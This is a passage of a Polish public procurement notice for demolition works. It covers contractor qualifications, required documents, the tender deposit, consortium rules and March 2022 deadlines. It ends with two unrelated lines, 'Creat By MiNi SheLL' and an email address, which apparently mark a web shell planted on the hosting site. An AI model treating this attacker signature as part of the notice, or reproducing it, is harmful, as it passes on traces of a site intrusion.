pojazdami kategorii N1 - pojazdy do przewozu ładunków o masie maksymalnej całkowitej nieprzekraczającej 3,5 t, c) 2<br/>maszynami roboczymi służącymi do mechanicznego wyburzania i rozbiórek obiektów oraz załadunku zgromadzonych odpadów po rozbiórce.Uwaga: Przez maszynę roboczą zamawiający rozumie urządzenie techniczne konstrukcją dostosowane do mechanicznego wyburzania i rozbiórek obiektów oraz załadunku zgromadzonych odpadów po rozbiórce, tj. koparki, koparko ładowarki, ładowarki, itp.2. zdolności zawodowej, jeżeli: 2.1 wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonali minimum 2 roboty polegające na wykonaniu robót rozbiórkowych obiektów budowlanych o wysokości, co najmniej 2 kondygnacji<br/>naziemnych, o wartości nie mniejszej niż 30 000 zł brutto każda. W przypadku Wykonawców, którzy będą wspólnie ubiegali się o udzielenie zamówienia w/w warunek nie będzie podlegał sumowaniu pojedynczych robót budowlanych, co oznacza, że realizacją dwóch wymaganych<br/>robót powinien wykazać się albo Wykonawca składający ofertę, albo, co najmniej jeden z uczestników konsorcjum, tzn., że jeżeli jeden z konsorcjantów wykonał jedną wymaganą robotę<br/>budowlaną, a drugi drugą, oznacza to, że warunek nie zostanie spełniony. Doświadczenie Wykonawcy, który wykonywał roboty budowlane w ramach konsorcjum, powinno być związane z faktycznym jego udziałem w ramach zrealizowanego zamówienia. Podmiot, na którego zdolności<br/>zawodowej w zakresie doświadczenia Wykonawca polega będzie musiał wykazać zrealizowanie 2 roboty w zakresie określonym przez Zamawiającego w SWZ.2.2 skierują do realizacji<br/>zamówienia minimum:a) 1 osobę (kierownika budowy) posiadającą przygotowanie zawodowe do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie, tj. posiadającą uprawnienia budowlane upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów w zakresie konstrukcyjno-budowlanym odpowiadającym zakresowi zamówienia,b) 3 osoby na stanowisku kierowcy, c) 2 osoby na stanowisku operatora maszyny roboczej.Kierowcy pojazdów o ładowności powyżej 3,5 tony<br/>muszą spełniać wymagania określone w art. 39a ustawy z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity Dz. U. z 2021 r. poz. 919 z późn. zm.).Operatorzy maszyn roboczych<br/>muszą mieć ukończone szkolenie na operatora tego sprzętu, zgodnie z art. 23 Rozporządzenia Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i<br/>drogowych (Dz.U. z 2020r. poz. 1461 z późn. zm.). Wykonawcy, którzy ubiegają się wspólnie oudzielenie zamówienia w/w warunek mogą spełniać łącznie.2.3 Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach zawodowych (w zakresie doświadczenia i osób) i technicznych innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.2.4 W odniesieniu<br/>do warunku dotyczącego zdolności zawodowej w zakresie doświadczenia oraz osób i zdolności technicznej, Wykonawcy mogą polegać na zdolności innych podmiotów, jeśli podmioty te zrealizują roboty, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, do złożenia oświadczenia o przynależności lub braku przynależności grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, żepowiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Podpisany formularz ofertowy<br/>2.Podpisany Formularz cenowy który należy sporządzić wg wzoru druku Zamawiającego <br/>3. Zaleca się załączyć do oferty kopię dowodu wpłaty wadium wpłaconego w pieniądzu.<br/>4. Oryginalna forma wadium wniesionego w jednej z form określonych w punkcie 18 ppkt. 2-4<br/>SWZ.<br/>5. Potwierdzenie, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>6. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których w pkt. 5, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskaże dane umożliwiające dostęp do tych dokumentów.<br/>7. Pełnomocnictwo jeśli dotyczy, szczegóły określono w pkt. 16.7 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> I.Oferta musi być zabezpieczona wadium w wysokości : – 3 500,00 zł,<br/>II.Termin wniesienia wadium upływa dnia 01.03.2022 r. o godz. 10:30<br/>Wadium musi obejmować okres związania ofertą do dnia 30.03.2022r.<br/>III.III. Wadium może być wnoszone w formie:<br/>1) pieniądza przelewem na rachunek bankowy Zamawiającego w Banku PEKAO SA nr konta:<br/>Część 1,2 - 71 1240 1268 1111 0010 5035 8604. Część 3,4 - 67 1240 1268 1111 0010 4833<br/>1376<br/>2) gwarancji bankowych,<br/>3) gwarancji ubezpieczeniowych,<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr<br/>109,poz. 1158, z późn. zm.).<br/>IV. Wadium wniesione w formie gwarancji lub poręczenia winno być złożone w<br/>oryginale, w formie lub postaci elektronicznej (dotyczy pkt 2-4) .<br/>V. Wadium wniesione w formie gwarancji lub poręczenia o których mowa w pkt 2- 4, musi<br/>wskazywać jako beneficjenta Gdańskie Nieruchomości Samorządowy Zakład Budżetowy.<br/>VI. Wadium wniesione w formie gwarancji lub poręczenia o których mowa w pkt 2-4, powinno<br/>być nieodwołalne i musi gwarantować zamawiającemu bezwarunkową wypłatę na jego pierwsze<br/>pisemne żądanie kwoty wadium w przypadkach określonych w art. 98 ust. 6 ustawy Pzp, bez<br/>jakichkolwiek dodatkowych zastrzeżeń i warunków. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. PEŁNOMOCNICTWO: a) Pełnomocnictwo upoważniające do działania w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenia zamówienia należy złożyć razem z ofertą.<br/>b) Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak<br/>składana oferta (t.j. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu)<br/>pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego<br/>poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. – Prawo<br/>o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio<br/>w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym<br/>mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego. 2. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Oświadczenie, o niepodleganiu wykluczeniu składa każdy z<br/>Wykonawców.Oświadczenie, o spełnianiu warunków udziału w postępowaniu składają<br/>Wykonawcy w zakresie, w jakim spełniają warunki udziału w postępowaniu. Oświadczenia<br/>wskazane powyżej składane są przez osoby upoważnione do reprezentowania każdego<br/>wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla<br/>formy organizacyjnej lub innym dokumencie, w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały szczegółowo opisane w paragrafie 14 projektowanych postanowień umowy w sprawie zamówienia publicznego stanowiącym załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-01 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-01 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1. Zamawiający wybierze najkorzystniejszą ofertę, która przedstawia najkorzystniejszy bilans ceny oraz innych kryteriów określonych w SWZ. 2. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej zastosowane będą przepisy od art. 248 do art. 251 ustawy<br/>Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca, który powierzył części zamówienia podwykonawcom podaje w złożonej<br/>ofercie:a) nazwy podwykonawców, którym powierza części zamówienia, jeżeli są znani oraz<br/>nazwy tych części, b) nazwy podmiotów udostępniających zasoby, na których zasoby się<br/>powołuje oraz nazwy tych części. 2. Wykonawca może w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do konkretnego<br/>zamówienia, lub jego części, polegać na zdolnościach zawodowych (w zakresie doświadczenia i<br/>osób) innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nim stosunków prawnych. „Stosowna sytuacja” wystąpi wyłącznie w przypadku,<br/>kiedy: - Wykonawca, który polega na zdolnościach zawodowych udowodni Zamawiającemu, że<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w<br/>szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia. - Zamawiający oceni, czy<br/>udostępniane Wykonawcy przez inne podmioty zdolności zawodowe, pozwalają na wykazanie<br/>przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą<br/>wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 108 ust. 1 i art. 109 ust.<br/>1pkt 5-10. 3. Poleganie na zdolnościach lub sytuacji innych podmiotów udostępniających<br/>zasoby. Wykonawca, który polega na zdolnościach innych podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia. Zobowiązanie<br/>podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności: a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresie podmiot<br/>udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków<br/>udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>Oświadczenie o niepodleganiu wykluczeniu składa każdy z podmiotów udostępniający zasoby.<br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu składa podmiot udostępniający<br/>zasoby w zakresie, w jakim wykonawca powołuje się na jego zasoby. Oświadczenia oraz<br/>zobowiązanie wskazane powyżej składane są przez osoby upoważnione do reprezentowania<br/>podmiotu udostępniającego zasoby (podwykonawcy), zgodnie z formą reprezentacji określoną w<br/>dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie, w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. 4. Punkty będą przyznawane według<br/>zasad określonych w pkt. 25 SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com